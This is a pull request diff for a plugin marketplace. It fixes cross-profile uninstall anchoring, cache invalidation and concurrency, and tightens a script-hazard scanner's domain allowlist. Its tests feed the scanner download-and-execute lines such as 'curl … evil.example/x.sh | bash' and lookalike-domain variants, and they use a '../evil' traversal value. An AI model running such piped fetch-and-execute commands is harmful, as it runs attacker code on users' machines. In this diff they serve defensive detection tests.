### PR TITLE
fix(profile): 跨 profile 安装状态机加固——卸载锚点/标注缓存/并发互斥/白名单边界

### DIFF
--- a/lib/client.js
+++ b/lib/client.js
@@ -1052,6 +1052,7 @@ window.__ModuleLoader__.load({
       function saveTargetProfile() {
         var name = targetProfile.trim() || "web";
         setProfileBusy(true);
+        var prevProfile = targetProfile;
         fetch("/api/marketplace/profile", {
           method: "POST",
           headers: mpHeaders({ "Content-Type": "application/json" }),
@@ -1060,6 +1061,9 @@ window.__ModuleLoader__.load({
           if (data && data.status === "done") {
             showToast(t("profileSaved", { profile: data.profile }), true);
             setTargetProfile(data.profile);
+            // 已安装标注随 profile 变化（服务端按当前 PROFILE_NM 扫描）——tick 触发
+            // PluginTab/SkillsTab 重新拉取，列表立即反映新目标的标注。
+            if (data.profile !== prevProfile) setTick(tick + 1);
           } else {
             showToast(t("profileSaveFail", { err: (data && data.error) || "unknown" }), false);
           }

--- a/lib/index.js
+++ b/lib/index.js
@@ -545,10 +545,11 @@ function isBundlePackage(pkg) {
     && typeof pkg.dsh.bundle.patch === "string" && pkg.dsh.bundle.patch.length > 0);
 }
 
-/** 读 profile 的 package.json；缺失/损坏返回 null（绝不凭空创建——会破坏 harness 的模板归一化）。 */
-async function readProfileManifest() {
+/** 读 profile 的 package.json；缺失/损坏返回 null（绝不凭空创建——会破坏 harness 的模板归一化）。
+ *  pkgPath 缺省用当前 PROFILE_PKG；跨 profile 卸载传旧 profile 的清单路径。 */
+async function readProfileManifest(pkgPath = PROFILE_PKG) {
   try {
-    const data = JSON.parse(await readFile(PROFILE_PKG, "utf8"));
+    const data = JSON.parse(await readFile(pkgPath, "utf8"));
     return data && typeof data === "object" ? data : null;
   } catch {
     return null;
@@ -556,10 +557,10 @@ async function readProfileManifest() {
 }
 
 /** profile package.json 原子写（tmp + rename，与 writeListCache/appendPatchEntry 同模式）。 */
-async function writeProfileManifest(data) {
-  const tmp = PROFILE_PKG + ".tmp";
+async function writeProfileManifest(data, pkgPath = PROFILE_PKG) {
+  const tmp = pkgPath + ".tmp";
   await writeFile(tmp, JSON.stringify(data, null, 2) + "\n", "utf8");
-  await rename(tmp, PROFILE_PKG);
+  await rename(tmp, pkgPath);
 }
 
 /**
@@ -1576,20 +1577,25 @@ async function isLanWriteEnabled() {
 const PROFILE_NAME_RE = /^[a-zA-Z0-9_-]+$/;
 
 /** 目标 profile 配置读取：config.json 的 targetProfile；非法/缺失回退 "web"。
- *  目录存在性校验——配置指向不存在的 profile 时回退（防装进空目录）。 */
+ *  目录存在性校验——配置指向不存在的 profile 时回退（防装进空目录）。
+ *  返回 { profile, fromConfig }：fromConfig=false 表示纯回退（无有效配置），
+ *  apply 的启动回调据此跳过覆盖——显式 setTargetProfile（面板保存/测试）不被
+ *  无配置的默认值冲掉（时序竞态守卫）。 */
 async function readTargetProfile() {
-  let name = "web";
+  let name = null;
   try {
     const cfg = JSON.parse(await readFile(join(MARKET_ROOT, "config.json"), "utf8"));
     if (typeof cfg?.targetProfile === "string" && PROFILE_NAME_RE.test(cfg.targetProfile)) {
       name = cfg.targetProfile;
     }
-  } catch { /* 缺失/损坏：默认 web */ }
-  try {
-    const st = await stat(join(DSH_HOME, "profiles", name));
-    if (!st.isDirectory()) return "web";
-  } catch { return "web"; }
-  return name;
+  } catch { /* 缺失/损坏：无有效配置 */ }
+  if (name !== null) {
+    try {
+      const st = await stat(join(DSH_HOME, "profiles", name));
+      if (!st.isDirectory()) name = null; // 配置指向不存在的 profile → 视为无效
+    } catch { name = null; }
+  }
+  return { profile: name ?? "web", fromConfig: name !== null };
 }
 
 /** 应用目标 profile：重算派生路径常量（37 处引用点零改动）。 */
@@ -1605,6 +1611,28 @@ function setTargetProfile(name) {
 
 /** 当前生效的 profile node_modules 路径（测试/诊断用）。 */
 function getProfileNodeModules() {
+  return PROFILE_NM;
+}
+
+/**
+ * 按安装记录定位真实 node_modules 锚点（跨 profile 边界）：
+ * targetProfile 切换后，旧 profile 安装记录的 location 仍指向旧落点——
+ * 按当前 PROFILE_NM 拼路径会找不到实体（检测更新报「未安装」/env 编辑空手而归/
+ * 卸载静默残留）。location 位于任一 profiles/<name>/node_modules 内时返回该
+ * node_modules 根；否则（skills/presets/cache 或无 location）返回当前 PROFILE_NM。
+ */
+function resolveRecordNodeModules(record) {
+  const location = String(record?.location ?? "");
+  if (location) {
+    const locResolved = resolve(location);
+    if (locResolved !== resolve(PROFILE_NM)
+        && locResolved.startsWith(join(DSH_HOME, "profiles") + sep)) {
+      const nmRoot = location.split(`${sep}node_modules${sep}`)[0];
+      if (nmRoot && PROFILE_NAME_RE.test(nmRoot.split(sep).at(-1) ?? "")) {
+        return join(nmRoot, "node_modules");
+      }
+    }
+  }
   return PROFILE_NM;
 }
 
@@ -2786,10 +2814,14 @@ const HAZARD_ALLOWLIST_DOMAINS = [
   "registry.npmjs.org",
 ];
 
-/** 行内 URL 是否命中白名单域名。 */
+/** 行内 URL 是否命中白名单域名。
+ *  域名边界锚定（自审 H1）：域名后必须是 /、引号、空白或行尾——否则
+ *  raw.githubusercontent.com.evil.io 这类后缀攻击域会被子串匹配误判为官方域，
+ *  downloadExec 命中被错误降级 medium。 */
 function hazardUrlAllowed(line) {
   for (const domain of HAZARD_ALLOWLIST_DOMAINS) {
-    if (new RegExp(`https?://(?:[^/\\s]*\\.)?${domain.replaceAll(".", "\\.")}`, "i").test(line)) return true;
+    const boundary = new RegExp(`https?://(?:[^/\\s]*\\.)?${domain.replaceAll(".", "\\.")}(?=[/"'\\s]|$)`, "i");
+    if (boundary.test(line)) return true;
   }
   return false;
 }
@@ -3361,6 +3393,8 @@ async function doSelfUpdate() {
   // dsh CLI 优先用 %APPDATA%\npm\dsh.cmd（start-dsh.bat 同款路径），缺失时回退 PATH 里的 dsh。
   try {
     const dshCli = join(process.env.APPDATA ?? "", "npm", "dsh.cmd");
+    // 自更新固定 web：本体的宿主 profile 与 targetProfile（插件安装目标）是两个概念
+    // ——用户在 web 里跑市场、把插件装去 desktop 时，本体更新仍应回到自己的家。
     const dshArgs = ["plugin", "--profile", "web", "install", SELF_UPDATE_REPO];
     // 超时 180s：官方 CLI 内部 spawn pnpm 在 Windows 上可能因 .cmd 垫片 EINVAL 立即失败，
     // 但也可能挂起——快速失败进入目录替换回退比让用户干等更合理。
@@ -3475,10 +3509,12 @@ function apply(ctx) {
     ctx.logger?.warn?.(`dsh-plugin-marketplace: 启动预热拉取失败 ${error}`);
   });
 
-  // 目标 profile 配置（issue #184）：启动时从 config.json 读取并应用（默认 web）。
-  // 面板保存时经 API 即时重算，无需重启。
-  readTargetProfile().then((name) => {
-    setTargetProfile(name);
+  // 目标 profile 配置（issue #184）：启动时从 config.json 读取并应用。
+  // 仅当配置真实存在且合法（fromConfig）才覆盖——显式 setTargetProfile（面板保存）
+  // 不被无配置的默认值冲掉；面板保存经 API 即时重算，无需重启。
+  readTargetProfile().then(({ profile, fromConfig }) => {
+    if (!fromConfig) return;
+    setTargetProfile(profile);
     ctx.logger?.info?.(`dsh-plugin-marketplace: 目标 profile = ${targetProfile}`);
   }).catch(() => {});
 
@@ -3968,8 +4004,14 @@ function apply(ctx) {
       if (keys.length === 0 && typeof record.location === "string" && record.location.length > 0) {
         // 路径注入防护（installed.json 可被篡改）：location 必须位于受管目录内——
         // 与 uninstall 的 resolve 防线同族，防扫描任意目录（泄露 API KEY 形态键名）。
+        // 受管面含全部 profiles/<name>/node_modules（targetProfile 切换后旧 profile
+        // 记录仍可编辑——resolveRecordNodeModules 同源语义）。
         const loc = String(record.location ?? "");
-        const managed = [PROFILE_NM, SKILLS_DIR, PRESETS_DIR, CACHE_DIR].some((d) => resolve(loc) === resolve(d) || resolve(loc).startsWith(resolve(d) + sep));
+        const locResolved = resolve(loc);
+        const managed = [resolveRecordNodeModules(record), SKILLS_DIR, PRESETS_DIR, CACHE_DIR].some((d) => {
+          const dr = resolve(d);
+          return locResolved === dr || locResolved.startsWith(dr + sep);
+        });
         if (managed) {
           try {
             keys = await scanRequirements(loc);
@@ -4056,8 +4098,9 @@ function apply(ctx) {
       if (parts.length > 2 || parts.some((s) => !/^@?[a-zA-Z0-9][a-zA-Z0-9._~-]*$/.test(s) || s === "." || s === "..")) {
         return json(res, 400, { error: t(lang, "badPkgName") });
       }
-      // 已装版本：node_modules/<pkgName>/package.json（scoped 包按 @scope/name 拆目录）
-      const pkgDir = join(PROFILE_NM, ...parts);
+      // 已装版本：node_modules/<pkgName>/package.json（scoped 包按 @scope/name 拆目录）。
+      // 锚点按安装记录定位（targetProfile 切换后旧 profile 记录仍指向真实落点）
+      const pkgDir = join(resolveRecordNodeModules(record), ...parts);
       const installedVersion = await readPackageVersion(pkgDir);
       if (!installedVersion) {
         return json(res, 200, { status: "done", installedVersion: null, latestVersion: null, updateAvailable: false, error: t(lang, "checkUpdateNoPkg") });
@@ -4208,7 +4251,7 @@ function apply(ctx) {
                   logLine(t(langFull, "cliUpdateTo", { target, version: npmLatest }));
                 }
               }
-              const args = ["plugin", "--profile", "web", cliInstall.verb === "add" ? "add" : "install", target];
+              const args = ["plugin", "--profile", targetProfile, cliInstall.verb === "add" ? "add" : "install", target];
               if (process.platform === "win32") {
                 // dsh 是 .cmd 垫片：execFile 无法直接启动，经 cmd.exe /c 启动。target 来自
                 // 仓库扫描内容（恶意仓库可控）——必须独立参数形式（Node 自动加引号）：
@@ -4324,7 +4367,8 @@ function apply(ctx) {
               const vulnsText = vulnHits
                 .slice(0, 10)
                 .map((h) => `  [${h.severity}] ${h.name}@${h.version} — ${h.title}${h.url ? `\n    ${h.url}` : ""}`)
-                .join("\n");
+                .join("\n")
+                + (vulnHits.length > 10 ? `\n  … +${vulnHits.length - 10} more` : "");
               return json(res, 200, {
                 status: "awaiting-input",
                 repo, type,
@@ -4677,24 +4721,10 @@ function apply(ctx) {
             }
             // 目标 profile 切换后卸载旧 profile 的安装（issue #184 边界）：按包名拼的
             // 路径指向当前 PROFILE_NM——旧 profile 的实体不在那里，rm force:true 静默
-            // 无操作 → 记录删除但目录/patch 残留（孤儿态）。此时改按 record.location
-            // 定位包目录（location 是安装时的真实落点），pnpm remove 同样以 location
-            // 所属 profile 为工作目录。
-            let legacyProfileDir = null;
-            if (targets.length > 0 && typeof record.location === "string"
-                && record.location !== PROFILE_NM) {
-              const locResolved = resolve(record.location);
-              // 在 profiles/ 下但不在当前 PROFILE_NM 下 → 旧 profile 安装
-              if (!locResolved.startsWith(resolve(PROFILE_NM) + sep)
-                  && locResolved.startsWith(join(DSH_HOME, "profiles") + sep)) {
-                const nmRoot = record.location.split(`${sep}node_modules${sep}`)[0];
-                if (nmRoot && PROFILE_NAME_RE.test(nmRoot.split(sep).at(-1) ?? "")) {
-                  legacyProfileDir = nmRoot;
-                  const pkgSeg = record.location.split(`${sep}node_modules${sep}`)[1];
-                  if (pkgSeg) targets = [pkgSeg];
-                }
-              }
-            }
+            // 无操作 → 记录删除但目录/patch 残留（孤儿态）。resolveRecordNodeModules
+            // 按 record.location 定位真实落点，pnpm remove 以其所属 profile 为工作目录。
+            const recordNm = resolveRecordNodeModules(record);
+            const legacyProfileDir = recordNm !== PROFILE_NM ? dirname(recordNm) : null;
             if (targets.length > 0) {
               // 审查 B2：卸载步骤失败不得静默吞错——目录删除失败或 patch 条目移除失败
               // 会造成「目录已删但 patch 残留（下次启动注册失败）」或反向的状态分裂。
@@ -4710,7 +4740,8 @@ function apply(ctx) {
                     await runPnpm(["remove", "--ignore-workspace", pkgName], { cwd: legacyProfileDir ?? PROFILE_WEB_DIR, env: buildFilteredEnv(), timeout: 600000 });
                     removed++;
                   } catch (error) {
-                    const manifest = await readProfileManifest();
+                    const legacyManifest = legacyProfileDir ? join(legacyProfileDir, "package.json") : PROFILE_PKG;
+                    const manifest = await readProfileManifest(legacyManifest);
                     if (manifest) {
                       let changed = false;
                       if (manifest.dependencies && typeof manifest.dependencies === "object"
@@ -4726,18 +4757,18 @@ function apply(ctx) {
                           changed = true;
                         }
                       }
-                      if (changed) await writeProfileManifest(manifest).catch(() => {});
+                      if (changed) await writeProfileManifest(manifest, legacyManifest).catch(() => {});
                     }
-                    const bundleDest = join(PROFILE_NM, pkgName);
-                    if (resolve(bundleDest).startsWith(resolve(PROFILE_NM) + sep)) {
+                    const bundleDest = join(recordNm, pkgName);
+                    if (resolve(bundleDest).startsWith(resolve(recordNm) + sep)) {
                       await rm(bundleDest, { recursive: true, force: true }).catch(() => {});
                     }
                     logLine(t(lang, "uninstallBundleDegraded", { name: pkgName, err: String(error?.message ?? error).slice(0, 200) }));
                   }
                   continue;
                 }
-                const dest = legacyProfileDir ? join(legacyProfileDir, "node_modules", pkgName) : join(PROFILE_NM, pkgName);
-                if (resolve(dest).startsWith(resolve(legacyProfileDir ?? PROFILE_NM) + sep)) {
+                const dest = join(recordNm, pkgName);
+                if (resolve(dest).startsWith(resolve(recordNm) + sep)) {
                   try {
                     await rm(dest, { recursive: true, force: true });
                     removed++;
@@ -5027,5 +5058,5 @@ async function installRepo({ type, cacheDir, repo, log, answers, logLine, lang, 
   return { type, instructions: true };
 }
 
-export { apply, detectInstalled, detectSkillInstalled, loadOwnRepo, scanProfilePackages, langOf, t, fetchAllRepos, fetchRegistryRepos, getList, isTrustedRequest, isTrustedHost, isSensitiveEnvKey, buildMinimalEnv, buildFilteredEnv, compareVersions, shouldUpdate, hasPatchEntry, normalizeRepo, appendPatchEntry, removePatchEntry, readLifecycleScripts, sanitizeManifest, isPnpmLocalDependency, matchProfileEntry, normalizeRepoRef, loadOfficialPackages, isOfficialPackage, readPackageSummary, findSkillRoots, findPluginRoots, findPresetRoots, detectType, detectTypeDetail, parseGitmodulesUrls, scanCliInstallHint, scanExternalCliHint, findCliInstall, installNpmTargetToTemp, installRepo, saveInstalled, scanScriptHazards, classifyInstallFailure, sanitizeLog, buildFeedbackLogSnapshot, buildEnvProfile, queueFeedback, queueFeedbackSafe, readBundledIndex, dedupeReposByPkgName, needsPluginBuild, adaptorRedirectRepo, applyAdaptorList, ensureInstalledIndex, annotateInstalled, annotateSkillInstalled, safeAssign, hasInstalledRecord, wslPosixPath, slugify, SCRIPT_ENV_KEYS, scanLifecycleHazards, scanCacheSecrets, scanCacheVulnerabilities, readVulnScanDeps, setTargetProfile, readTargetProfile, getProfileNodeModules };
+export { apply, detectInstalled, detectSkillInstalled, loadOwnRepo, scanProfilePackages, langOf, t, fetchAllRepos, fetchRegistryRepos, getList, isTrustedRequest, isTrustedHost, isSensitiveEnvKey, buildMinimalEnv, buildFilteredEnv, compareVersions, shouldUpdate, hasPatchEntry, normalizeRepo, appendPatchEntry, removePatchEntry, readLifecycleScripts, sanitizeManifest, isPnpmLocalDependency, matchProfileEntry, normalizeRepoRef, loadOfficialPackages, isOfficialPackage, readPackageSummary, findSkillRoots, findPluginRoots, findPresetRoots, detectType, detectTypeDetail, parseGitmodulesUrls, scanCliInstallHint, scanExternalCliHint, findCliInstall, installNpmTargetToTemp, installRepo, saveInstalled, scanScriptHazards, classifyInstallFailure, sanitizeLog, buildFeedbackLogSnapshot, buildEnvProfile, queueFeedback, queueFeedbackSafe, readBundledIndex, dedupeReposByPkgName, needsPluginBuild, adaptorRedirectRepo, applyAdaptorList, ensureInstalledIndex, annotateInstalled, annotateSkillInstalled, safeAssign, hasInstalledRecord, wslPosixPath, slugify, SCRIPT_ENV_KEYS, scanLifecycleHazards, scanCacheSecrets, scanCacheVulnerabilities, readVulnScanDeps, setTargetProfile, readTargetProfile, getProfileNodeModules, resolveRecordNodeModules };
 

--- a/lib/index.js
+++ b/lib/index.js
@@ -1630,7 +1630,8 @@ function getProfileNodeModules() {
  * targetProfile 切换后，旧 profile 安装记录的 location 仍指向旧落点——
  * 按当前 PROFILE_NM 拼路径会找不到实体（检测更新报「未安装」/env 编辑空手而归/
  * 卸载静默残留）。location 位于任一 profiles/<name>/node_modules 内时返回该
- * node_modules 根；否则（skills/presets/cache 或无 location）返回当前 PROFILE_NM。
+ * node_modules 根；CLI 记录（官方 CLI 安装）无包级 location，用安装时刻保存的
+ * profile 提示定位；两者皆无返回当前 PROFILE_NM。
  */
 function resolveRecordNodeModules(record) {
   const location = String(record?.location ?? "");
@@ -1643,6 +1644,10 @@ function resolveRecordNodeModules(record) {
         return join(nmRoot, "node_modules");
       }
     }
+  }
+  const hinted = record && typeof record.profile === "string" ? record.profile : "";
+  if (hinted && PROFILE_NAME_RE.test(hinted)) {
+    return join(DSH_HOME, "profiles", hinted, "node_modules");
   }
   return PROFILE_NM;
 }
@@ -4279,7 +4284,9 @@ function apply(ctx) {
                 await execFileAsync("dsh", args, { cwd: cacheDir, env: cliEnv, timeout: 180000, maxBuffer: MAX_EXEC_BUFFER, windowsHide: true });
               }
               logLine(t(langFull, "cliDone"));
-              await saveInstalled(repo, { type: "cli", name: cliInstall.target, names: null, location: null, version: null, installedAt: Date.now(), envKeys: null });
+              // CLI 记录无包级 location（官方 CLI 自管落点）——保存安装时刻的 targetProfile
+              // 作为锚点提示：切换 profile 后卸载/检测更新仍能定位真实 profile（七轮审计）。
+              await saveInstalled(repo, { type: "cli", name: cliInstall.target, names: null, location: null, version: null, installedAt: Date.now(), envKeys: null, profile: targetProfile });
               await queueFeedbackSafe({
                 repo, name: cliInstall.target, type: "cli", version: null, installedAt: Date.now(),
                 method: "cli",

--- a/lib/index.js
+++ b/lib/index.js
@@ -1598,7 +1598,11 @@ async function readTargetProfile() {
   return { profile: name ?? "web", fromConfig: name !== null };
 }
 
-/** 应用目标 profile：重算派生路径常量（37 处引用点零改动）。 */
+/** 应用目标 profile：重算派生路径常量（37 处引用点零改动）。
+ *  同时失效 profile 扫描缓存与已安装索引：两者都按旧 PROFILE_NM 构建（列表
+ *  「已安装」标注来源）——不失效则切换后列表仍按旧 profile 目录判已装，
+ *  切回时旧标注反向残留（stale 且反向失效）。代际递增复用现有 gen 机制，
+ *  防「切换瞬间正在构建的旧快照」回写覆盖。 */
 function setTargetProfile(name) {
   const safe = PROFILE_NAME_RE.test(String(name ?? "")) ? String(name) : "web";
   targetProfile = safe;
@@ -1606,6 +1610,9 @@ function setTargetProfile(name) {
   PROFILE_NM = join(PROFILE_WEB_DIR, "node_modules");
   PATCH_FILE = join(PROFILE_WEB_DIR, "cordis.patch.yml");
   PROFILE_PKG = join(PROFILE_WEB_DIR, "package.json");
+  profileScanCache = null;
+  installedIndex = null;
+  installedIndexGen++;
   return safe;
 }
 

--- a/lib/index.js
+++ b/lib/index.js
@@ -959,7 +959,9 @@ async function annotateInstalled(repo) {
 }
 
 /** 列表内容指纹（full_name 序列 FNV 轻量哈希）：随响应带给客户端，刷新对照用——
- *  内容未变时客户端跳过重渲染（不闪烁、保留分页位置）。 */
+ *  内容未变时客户端跳过重渲染（不闪烁、保留分页位置）。
+ *  纳入 installed 标志：安装/卸载/切 profile 会改变「已安装」标注而不改 full_name
+ *  序列（标注随请求时状态计算）——不含它会漏掉重渲染，列表停留在旧标注。 */
 function listFingerprint(repos) {
   let h = 2166136261;
   for (const r of repos) {
@@ -969,6 +971,8 @@ function listFingerprint(repos) {
       h = Math.imul(h, 16777619);
     }
     h ^= 0x3b;
+    // installed 标志位（0/1）混入：安装状态变化 → 指纹变化 → 客户端重渲染
+    h ^= r?.installed === true ? 0x5f : 0;
   }
   // 附带列表长度：内容一进一出（长度变）时指纹必不同，消除 32 位 FNV 的同长度碰撞面
   return `${h >>> 0}-${repos.length}`;

--- a/lib/index.js
+++ b/lib/index.js
@@ -4039,6 +4039,11 @@ function apply(ctx) {
       }
       if (req.method !== "POST") return json(res, 405, { error: t(lang, "methodNotAllowed") });
       if (!(await isWriteAllowed(req))) return json(res, 403, { error: t(lang, "forbidden") });
+      // 安装/卸载/自更新进行中禁止切换目标 profile：安装路径运行时读
+      // PROFILE_NM/PATCH_FILE/PROFILE_PKG 常量（registerBundlePackage/
+      // appendPatchEntry 等），切换会使运行中安装的落点突变——记录与实体错位
+      // 或 patch 写进另一个 profile。与 install/uninstall 共用 installBusy 语义。
+      if (installRunning !== null) return json(res, 409, { error: t(lang, "installBusy") });
       let body;
       try {
         body = await readJsonBody(req);

--- a/lib/index.js
+++ b/lib/index.js
@@ -1705,9 +1705,9 @@ async function appendPatchEntry(entryId, pkgName) {
  * L1（KIMI 审阅）：行级块解析只保证处理本插件写入的格式（`- insert:` + 缩进 id/name）；
  * 带行内注释/多行值的手写条目可能整块保留，不做「部分删除」的承诺。
  */
-async function removePatchEntry(pkgName) {
+async function removePatchEntry(pkgName, patchPath = PATCH_FILE) {
   const task = (async () => {
-    const patch = await readFile(PATCH_FILE, "utf8").catch(() => "");
+    const patch = await readFile(patchPath, "utf8").catch(() => "");
     if (!hasPatchEntry(patch, pkgName)) return false;
     const escaped = pkgName.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
     const namePattern = new RegExp("^\\s*name:\\s*(?:\"|')?" + escaped + "(?:\"|')?\\s*$", "m");
@@ -1750,9 +1750,9 @@ async function removePatchEntry(pkgName) {
     // 会清掉 DSH 皮肤配置，实测暴露）。
     const hasContent = out.some((l) => l.trim() !== "" && !l.trim().startsWith("#"));
     if (!hasContent) next = "[]\n";
-    const tmp = PATCH_FILE + ".tmp";
+    const tmp = patchPath + ".tmp";
     await writeFile(tmp, next, "utf8");
-    await rename(tmp, PATCH_FILE);
+    await rename(tmp, patchPath);
     return true;
   })();
   // 与 appendPatchEntry 同款队列链式（审查 B4）：错误直接抛出、返回契约 true/false。
@@ -3649,7 +3649,8 @@ function apply(ctx) {
               if (cliParts.length > 2 || cliParts.some((s) => !/^@?[a-zA-Z0-9][a-zA-Z0-9._~-]*$/.test(s) || s === "." || s === "..")) {
                 installedVersion = null;
               } else {
-                installedVersion = await readPackageVersion(join(PROFILE_NM, ...cliParts));
+                // 锚点按安装记录定位（targetProfile 切换后旧 profile 记录仍可对比版本）
+                installedVersion = await readPackageVersion(join(resolveRecordNodeModules(record), ...cliParts));
               }
             }
             // m2：仅已装版本严格低于最新版本才提示「更新」（仓库回滚/降级不再误报）。
@@ -4714,17 +4715,19 @@ function apply(ctx) {
             } else if (typeof record.name === "string" && record.name && !/-plugins$/.test(record.name)) {
               targets = [record.name];
             }
-            if (targets.length === 0 && typeof record.location === "string"
-                && record.location !== PROFILE_NM
-                && resolve(record.location).startsWith(resolve(PROFILE_NM) + sep)) {
-              targets = [record.location.split(sep).at(-1)];
-            }
             // 目标 profile 切换后卸载旧 profile 的安装（issue #184 边界）：按包名拼的
             // 路径指向当前 PROFILE_NM——旧 profile 的实体不在那里，rm force:true 静默
             // 无操作 → 记录删除但目录/patch 残留（孤儿态）。resolveRecordNodeModules
             // 按 record.location 定位真实落点，pnpm remove 以其所属 profile 为工作目录。
             const recordNm = resolveRecordNodeModules(record);
             const legacyProfileDir = recordNm !== PROFILE_NM ? dirname(recordNm) : null;
+            // 旧记录退化为 location 推断：锚点按记录定位（跨 profile 时 location 在
+            // 旧 profile 的 node_modules 内，同样可推断包名——不能用当前 PROFILE_NM 判断）
+            if (targets.length === 0 && typeof record.location === "string"
+                && record.location !== recordNm
+                && resolve(record.location).startsWith(resolve(recordNm) + sep)) {
+              targets = [record.location.split(sep).at(-1)];
+            }
             if (targets.length > 0) {
               // 审查 B2：卸载步骤失败不得静默吞错——目录删除失败或 patch 条目移除失败
               // 会造成「目录已删但 patch 残留（下次启动注册失败）」或反向的状态分裂。
@@ -4777,7 +4780,9 @@ function apply(ctx) {
                   }
                 }
                 try {
-                  await removePatchEntry(pkgName);
+                  // 跨 profile 卸载：patch 条目在安装时的 profile（recordNm 所属），
+                  // 不在当前 PATCH_FILE——清错文件会让旧 profile 启动时注册失败
+                  await removePatchEntry(pkgName, legacyProfileDir ? join(legacyProfileDir, "cordis.patch.yml") : PATCH_FILE);
                 } catch (error) {
                   logLine(t(lang, "uninstallPatchFail", { name: pkgName, err: String(error?.message ?? error) }));
                 }

--- a/scripts/tests/integration/lib.test.mjs
+++ b/scripts/tests/integration/lib.test.mjs
@@ -1704,6 +1704,17 @@ function mockFetchCapture(payload, status = 200) {
       check("锚点：非法 profile 名回退",
         lib.resolveRecordNodeModules({ location: join(profilesRoot, "..", "evil", "node_modules", "x") }),
         join(profilesRoot, "desktop", "node_modules"));
+      // 七轮审计：CLI 记录（无 location）用安装时刻保存的 profile 提示定位
+      check("锚点：CLI 记录 profile 提示定位到提示的 profile",
+        lib.resolveRecordNodeModules({ location: null, profile: "legacy" }), legacyNm);
+      // 提示非法（穿越形态）→ 回退当前 PROFILE_NM
+      check("锚点：CLI 记录非法提示回退当前 NM",
+        lib.resolveRecordNodeModules({ location: null, profile: "../evil" }),
+        join(profilesRoot, "desktop", "node_modules"));
+      // 无提示且无 location → 回退当前 PROFILE_NM
+      check("锚点：CLI 记录无提示回退当前 NM",
+        lib.resolveRecordNodeModules({ profile: null }),
+        join(profilesRoot, "desktop", "node_modules"));
     } finally {
       lib.setTargetProfile("web");
     }

--- a/scripts/tests/integration/lib.test.mjs
+++ b/scripts/tests/integration/lib.test.mjs
@@ -662,6 +662,9 @@ function mockFetchCapture(payload, status = 200) {
           type: "cordis-plugin", name: "legacy-web-plugin", names: ["legacy-web-plugin"],
           location: legacyPkg, version: "0.9.0", installedAt: Date.now(), envKeys: null,
         });
+        // K2 回归：旧 profile 的 cordis.patch.yml 条目必须被清理（而非当前 profile 的文件）
+        const webPatch = join(web, "cordis.patch.yml");
+        writeFileSync(webPatch, "[]\n- insert:\n    id: mp-legacy\n    name: \"legacy-web-plugin\"\n", "utf8");
         lib.setTargetProfile("desktop");
         try {
           const registeredX = [];
@@ -684,6 +687,46 @@ function mockFetchCapture(payload, status = 200) {
           check("跨 profile 卸载删除旧 profile 实体目录", existsSync(legacyPkg), false);
           check("跨 profile 卸载不误删当前 profile 目录", existsSync(join(process.env.DSH_HOME, "profiles", "desktop", "node_modules")), true);
           check("跨 profile 卸载移除安装记录", lib.hasInstalledRecord("fake/legacy-repo"), false);
+          const webPatchAfter = readFileSync(webPatch, "utf8");
+          check("跨 profile 卸载清理旧 profile patch 条目", webPatchAfter.includes("legacy-web-plugin"), false);
+        } finally {
+          lib.setTargetProfile("web");
+        }
+      }
+
+      // K22 回归：无 names 字段的旧记录（name 为 -plugins 结尾的仓库目录名，L5 防呆
+      // 放弃 name）跨 profile 卸载——targets 推断必须按 recordNm 锚点定位。修复前用
+      // 当前 PROFILE_NM 判断，跨 profile 时 location 在旧 profile → 条件 false →
+      // targets 空 → 走 uninstallNoTargets → 记录删除但目录/patch 残留（孤儿态）。
+      {
+        const legacyPkg = join(web, "node_modules", "real-pkg");
+        mkdirSync(legacyPkg, { recursive: true });
+        writeFileSync(join(legacyPkg, "package.json"), JSON.stringify({ name: "real-pkg", version: "0.5.0" }), "utf8");
+        await lib.saveInstalled("fake/legacy-no-names", {
+          type: "cordis-plugin", name: "legacy-plugins",
+          location: legacyPkg, version: "0.5.0", installedAt: Date.now(), envKeys: null,
+        });
+        lib.setTargetProfile("desktop");
+        try {
+          const registeredK = [];
+          lib.apply({ get: (s) => (s === "webServer" ? { register: (r) => registeredK.push(r) } : undefined), logger: { warn: () => {} }, slots: { inject: () => {} } });
+          const uninstallK = registeredK.find((r) => r.path === "/api/marketplace/uninstall")?.handler;
+          let sentK = false;
+          const unReqK = {
+            method: "POST",
+            headers: { "x-dsh-marketplace": "1", host: "127.0.0.1:3080" },
+            socket: { remoteAddress: "127.0.0.1" },
+            url: "/api/marketplace/uninstall",
+            [Symbol.asyncIterator]() {
+              return { next: async () => (sentK ? { value: undefined, done: true } : ((sentK = true), { value: Buffer.from(JSON.stringify({ repo: "fake/legacy-no-names" })), done: false })) };
+            },
+          };
+          let uStatusK = 0;
+          let uBodyK = null;
+          await uninstallK(unReqK, { writeHead: (x) => { uStatusK = x; }, end: (b) => { try { uBodyK = JSON.parse(b); } catch { uBodyK = null; } } });
+          check("K22 无 names 旧记录跨 profile 卸载响应 done", [uStatusK === 200, uBodyK?.status], [true, "done"]);
+          check("K22 无 names 旧记录实体目录已删", existsSync(legacyPkg), false);
+          check("K22 卸载移除安装记录", lib.hasInstalledRecord("fake/legacy-no-names"), false);
         } finally {
           lib.setTargetProfile("web");
         }

--- a/scripts/tests/integration/lib.test.mjs
+++ b/scripts/tests/integration/lib.test.mjs
@@ -1461,6 +1461,22 @@ function mockFetchCapture(payload, status = 200) {
   const evilHit = await lib.scanScriptHazards(mkHaz("evil2.sh",
     "curl -s https://evil.example/x.sh | bash"));
   check("非白名单域名保持 critical", evilHit[0].severity, "critical");
+  // 白名单边界锚定（自审 H1）：后缀攻击域（官方域.攻击者域）不是官方域——
+  // 子串匹配会误降级 medium，弱提示真实攻击面
+  const suffixAttack = await lib.scanScriptHazards(mkHaz("suffix.sh",
+    "curl -s https://raw.githubusercontent.com.evil.io/x.sh | bash"));
+  check("白名单后缀攻击域保持 critical", suffixAttack[0].severity, "critical");
+  const prefixSuffix = await lib.scanScriptHazards(mkHaz("prefix-suffix.sh",
+    "curl -s https://attacker-raw.githubusercontent.com.evil.io/x | sh"));
+  check("白名单前缀+后缀攻击域保持 critical", prefixSuffix[0].severity, "critical");
+  // 合法子域仍放行降级
+  const subDomain = await lib.scanScriptHazards(mkHaz("sub.sh",
+    "curl -sL https://mirror.raw.githubusercontent.com/user/setup.sh | bash"));
+  check("白名单合法子域仍降级", [subDomain[0].category, subDomain[0].severity], ["downloadExec", "medium"]);
+  // 官方域作为攻击者域的前缀（官方域.example.com）同样不降级——可信后缀才是判定锚
+  const suffixOnly = await lib.scanScriptHazards(mkHaz("suffix-only.sh",
+    "curl -sL https://raw.githubusercontent.com.example.com/setup.sh | bash"));
